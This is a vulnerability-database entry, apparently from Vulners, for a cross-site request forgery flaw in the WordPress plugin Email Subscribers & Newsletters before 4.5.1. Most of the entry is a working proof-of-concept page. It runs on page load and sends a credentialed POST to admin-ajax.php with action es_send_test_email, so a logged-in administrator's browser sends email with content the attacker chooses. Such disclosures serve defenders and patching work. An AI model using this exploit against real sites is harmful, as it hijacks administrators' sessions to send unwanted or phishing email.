Lucene search

K

Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email()

🗓️ 18 Jul 2020 00:00:00Reported by wpvulndbType 
wpexploit
 wpexploit
👁 8 Views

Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email() vulnerabilit

Show more
Related
Refs
Code
<!DOCTYPE html>
<html>
<body onload=run()>
<script>
function run() {
  var targetUrl = "http://example.com/webpage";
  var email = "[email protected]";  
  var subject = "PoC"; 
  var content = "add content here";  

  var xhttp = new XMLHttpRequest();  
  var data = "es_test_email=" + email + "&subject=" + subject +"&content=" + content + "&action=es_send_test_email";
  var url = targetUrl + "/wp-admin/admin-ajax.php?";
  var method = "POST";

  xhttp.open(method, url);
  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhttp.withCredentials = true;
  xhttp.send(data);  }
</script>
</body>
</html>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Jul 2020 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.001
8
.json
Report